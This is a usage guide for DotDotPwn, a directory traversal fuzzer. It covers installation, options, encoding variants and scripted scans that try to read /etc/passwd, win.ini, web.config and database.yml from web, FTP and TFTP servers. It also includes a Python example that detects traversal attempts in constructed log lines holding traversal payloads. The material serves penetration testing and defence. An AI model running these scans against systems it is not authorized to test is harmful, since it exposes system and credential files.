
DotDotPwn

DotDotPwn is a comprehensive directory traversal fuzzer designed to test web servers and applications for path traversal vulnerabilities. It supports multiple traversal patterns, encoding methods, and protocol variations. DotDotPwn is effective for testing various platforms including Apache, IIS, and custom web applications, making it a valuable tool for vulnerability assessment and penetration testing.

The tool systematically tests different traversal sequences, encoding techniques, and protocols to identify path traversal weaknesses that could allow unauthorized access to sensitive files.

# Debian/Kali package
sudo apt-get update
sudo apt-get install dotdotpwn

# Or from source
git clone https://github.com/wireghoul/dotdotpwn.git
cd dotdotpwn
perl dotdotpwn.pl   # no arguments prints the banner and usage (-h is the target host, not help)

# Install required Perl modules
sudo apt-get install libwww-perl libio-socket-ssl-perl

# Or via cpan
cpan IO::Socket::SSL
cpan LWP::UserAgent

# Verify the installation
perl dotdotpwn.pl   # the banner shows the version, followed by the option list
which dotdotpwn     # if installed from the package
Command                                                                              Description
perl dotdotpwn.pl -m http -h target.com                                              Test HTTP for directory traversal
perl dotdotpwn.pl -m ftp -h target.com                                               Test FTP for directory traversal
perl dotdotpwn.pl -m http -h target.com -x 8080                                      Test custom port
perl dotdotpwn.pl -m http-url -u "http://target.com/file.txt?f=TRAVERSAL" -k "root:"   Test a specific URL: TRAVERSAL marks the part to fuzz, -k the string expected on a hit (f is a placeholder parameter name)
# Basic HTTP traversal test (-m selects the module, -h the target host)
perl dotdotpwn.pl -m http -h example.com

# Every attempt is printed by default; -q switches to quiet mode
perl dotdotpwn.pl -m http -h example.com -q

# Test specific port
perl dotdotpwn.pl -m http -h example.com -x 8080

# Test a specific URL: the http-url module fuzzes the part marked TRAVERSAL
# ("file" is a placeholder parameter name; -k is the string expected in a successful response)
perl dotdotpwn.pl -m http-url -u "http://example.com/download.php?file=TRAVERSAL" -k "root:"

# Test FTP server
perl dotdotpwn.pl -m ftp -h ftp.example.com

# FTP on non-standard port
perl dotdotpwn.pl -m ftp -h ftp.example.com -x 2121

# Test with credentials (defaults are anonymous / dot@dot.pwn)
perl dotdotpwn.pl -m ftp -h ftp.example.com -U user -P password

# Test TFTP
perl dotdotpwn.pl -m tftp -h example.com

# Test HTTP over SSL/TLS (-S)
perl dotdotpwn.pl -m http -h example.com -x 443 -S
Encoding           Example pattern          Description
No encoding        ../                      Plain ../ patterns
URL encoding       %2e%2e%2f                Percent-encoded dots and slash
Double encoding    %252e%252e%252f          Encoded twice, for servers that decode more than once
UTF-8 encoding     %c0%ae%c0%ae%c0%af       Overlong UTF-8 forms of . and /
Backslash          ..\                      Windows-style backslash separators

DotDotPwn has no switch to select a single encoding: its TraversalEngine generates every encoded variant of each traversal on every run. The stdout module prints the generated strings without sending anything, which is the easiest way to inspect them.

# Print the generated traversal strings (nothing is sent to a target)
perl dotdotpwn.pl -m stdout -d 3

# Count how many variants a given depth produces
perl dotdotpwn.pl -m stdout -d 3 | wc -l

# Run the full set (all encodings) against a host
perl dotdotpwn.pl -m http -h example.com
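The encodings in the table above, seen from the defending side: an added example (not DotDotPwn's code) that canonicalises a request through each of those forms, refuses paths that escape a document root, and scans access-log lines for traversal attempts. The log lines, the `file` parameter and the root path are constructed.

```python
"""Canonicalise a request path through the encodings DotDotPwn fuzzes (plain, URL,
double, overlong UTF-8, backslash) and flag traversal.  Added example; the log
lines and document root below are constructed."""
import posixpath
import re
from urllib.parse import unquote

# Percent-encoded overlong/alternate UTF-8 sequences for '.', '/' and '\'.
OVERLONG = {"%c0%ae": ".", "%c0%af": "/", "%c0%2f": "/", "%c1%9c": "\\"}
OVERLONG_RE = re.compile("|".join(map(re.escape, OVERLONG)), re.IGNORECASE)

def canonicalise(raw: str, max_rounds: int = 3) -> str:
    """Map overlong forms and percent-decode until the string stops changing
    (catches double encoding), then treat backslashes as separators."""
    s = raw
    for _ in range(max_rounds):
        s = OVERLONG_RE.sub(lambda m: OVERLONG[m.group(0).lower()], s)
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s.replace("\\", "/")

def is_traversal(raw: str) -> bool:
    """True if a '..' component appears in the path or in any query value."""
    return ".." in re.split(r"[/?=&]", canonicalise(raw))

def safe_resolve(root: str, user_path: str):
    """Mitigation: resolve under root and refuse anything that escapes it
    (pure string check, so it runs without a filesystem)."""
    target = posixpath.normpath(posixpath.join(root, canonicalise(user_path).lstrip("/")))
    return target if target == root or target.startswith(root + "/") else None

def scan_log(lines):
    """Detection: (line number, canonical request) for every traversal attempt."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if m and is_traversal(m.group(1)):
            hits.append((n, canonicalise(m.group(1))))
    return hits

# Constructed access-log lines: a benign request, then one per encoding above.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /download.php?file=report.pdf HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /download.php?file=../../../etc/passwd HTTP/1.1" 200 1024',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /download.php?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 404 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /download.php?file=%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /download.php?file=%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini HTTP/1.1" 404 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /download.php?file=..\\..\\windows\\win.ini HTTP/1.1" 200 92',
]
```

A server that percent-decodes only once misses the double-encoded line; decoding until the string is stable before the `..` check is what closes that gap.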
Option   Usage               Description
-m       -m http             Module: http, http-url, ftp, tftp, payload or stdout
-o       -o unix             OS type if known (windows, unix or generic); -O runs nmap OS detection instead
-d       -d 5                Traversal depth (number of ../; default 6)
-f       -f /etc/passwd      Specific file to look for
-k       -k "root:"          Text expected in the response when the file was read
-e       -e .php             Extension appended to every fuzz string
-S       -S                  Use SSL for the http and payload modules
-r       -r results.txt      Report filename
-x       -x 8080             Port to connect to
-t       -t 500              Delay between requests in milliseconds (default 300)
-b       -b                  Stop after the first vulnerability found
# Look for /etc/passwd (-k is the string expected in the response on a hit)
perl dotdotpwn.pl -m http -h example.com -f /etc/passwd -k "root:"

# Look for Windows system files (-o windows selects the Windows traversal set)
perl dotdotpwn.pl -m http -h example.com -o windows -f windows/win.ini

# Look for web server config
perl dotdotpwn.pl -m http -h example.com -f etc/apache2/apache2.conf

# Look for application files
perl dotdotpwn.pl -m http -h example.com -f app/config/database.yml

# Shallow traversal (few ../ sequences)
perl dotdotpwn.pl -m http -h example.com -d 3

# Deep traversal (many ../ sequences)
perl dotdotpwn.pl -m http -h example.com -d 10

# Custom extension appended to each fuzz string
perl dotdotpwn.pl -m http -h example.com -e .asp

# Multiple extensions: -e takes a single value, so loop over them
for ext in .php .jsp .asp; do
  perl dotdotpwn.pl -m http -h example.com -e "$ext"
done
# Write a report (-r); the tool saves it under its Reports/ directory
perl dotdotpwn.pl -m http -h example.com -r results.txt

# Review findings
cat Reports/results.txt

# Extract successful paths
grep -i "vulnerable" Reports/results.txt

# Get only vulnerable URLs
perl dotdotpwn.pl -m http -h example.com | grep -i "vulnerable"

# Count potential vulnerabilities
perl dotdotpwn.pl -m http -h example.com | grep -ci "vulnerable"

# Extract the URLs from the vulnerable lines
perl dotdotpwn.pl -m http -h example.com | grep -i "vulnerable" | grep -oE 'https?://[^ ]+'
# Full assessment of a specific URL ("file" is a placeholder parameter name)
perl dotdotpwn.pl -m http-url -u "http://target.com/download.php?file=TRAVERSAL" -k "root:"

# Test multiple paths
for path in /download /file /get /download.php; do
  echo "[*] Testing path: $path"
  perl dotdotpwn.pl -m http-url -u "http://target.com${path}?file=TRAVERSAL" -k "root:"
done

# Save comprehensive results (-r report filename)
perl dotdotpwn.pl -m http -h target.com -r assessment_results.txt

# Test FTP (every encoding is generated automatically)
perl dotdotpwn.pl -m ftp -h ftp.target.com

# Test with credentials
perl dotdotpwn.pl -m ftp -h ftp.target.com -U admin -P password

# Look for sensitive files
declare -a files=("/etc/passwd" "web.config" "config.php" "settings.xml")
for file in "${files[@]}"; do
  echo "[*] Looking for: $file"
  perl dotdotpwn.pl -m http -h example.com -f "$file"
done

# Test various traversal depths (-X instead bisects the exact depth after a hit)
for depth in 3 5 7 10 15; do
  echo "[*] Testing depth: $depth"
  perl dotdotpwn.pl -m http -h example.com -d "$depth"
done
# Test Apache specifically (unix traversal set)
perl dotdotpwn.pl -m http -h apache.target.com -o unix

# Look for Apache config
perl dotdotpwn.pl -m http -h apache.target.com -o unix -f etc/apache2/apache2.conf

# Test for .htaccess
perl dotdotpwn.pl -m http -h apache.target.com -o unix -f .htaccess

# Test IIS specifically (windows traversal set, which includes the backslash variants)
perl dotdotpwn.pl -m http -h iis.target.com -o windows

# Look for web.config
perl dotdotpwn.pl -m http -h iis.target.com -o windows -f windows/web.config

# Let nmap fingerprint the OS first (-O) instead of choosing the set by hand
perl dotdotpwn.pl -m http -h iis.target.com -O

# Test Tomcat specifically (-s grabs the service banner first)
perl dotdotpwn.pl -m http -h tomcat.target.com -o generic -s

# Look for Tomcat configuration
perl dotdotpwn.pl -m http -h tomcat.target.com -f conf/server.xml
# Test connectivity first
ping target.com
nc -zv target.com 80

# Slow server: raise the delay between requests (-t, milliseconds) and continue on empty responses (-C)
perl dotdotpwn.pl -m http -h target.com -t 1000 -C

# Check if SSL is needed
perl dotdotpwn.pl -m http -h target.com -x 443 -S

# Each attempt is printed by default, so watch what is being sent
perl dotdotpwn.pl -m http -h target.com

# Test with a specific URL ("file" is a placeholder parameter name)
perl dotdotpwn.pl -m http-url -u "http://target.com/download.php?file=TRAVERSAL" -k "root:"

# Check Perl module installation (double quotes so "\n" is a newline, not a literal backslash-n)
perl -e 'use LWP::UserAgent; print "OK\n"'

# Reinstall modules if needed
cpan -i IO::Socket::SSL
cpan -i LWP::UserAgent
# Use DotDotPwn findings in other tools: keep only the URLs flagged vulnerable
perl dotdotpwn.pl -m http -h example.com | grep -i "vulnerable" | grep -oE 'https?://[^ ]+' > vulnerable_urls.txt

# Re-check each finding with curl
while read -r url; do
  curl -s "$url" | head -n 5
done < vulnerable_urls.txt

#!/bin/bash
# Run each traversal set (unix, windows, generic) with its own report
TARGET="example.com"
OSTYPES=(unix windows generic)

for os in "${OSTYPES[@]}"; do
  echo "[*] Testing traversal set: $os"
  perl dotdotpwn.pl -m http -h "$TARGET" -o "$os" -r "results_${os}.txt"
done

# Combine results (reports are written under the tool's Reports/ directory)
cat Reports/results_*.txt | grep -i "vulnerable" > final_results.txt
  • Test all encoding methods, not just plain traversal
  • Try different path depths based on application structure
  • Test multiple protocol types (HTTP, FTP, etc.)
  • Look for specific sensitive files relevant to target application
  • Document all successful traversal paths found
  • Test both standard and non-standard ports
  • Use appropriate timeouts for slow servers
  • Be aware of rate limiting and WAF detection
  • Respect scope and authorization for testing
  • Combine with other vulnerability assessment tools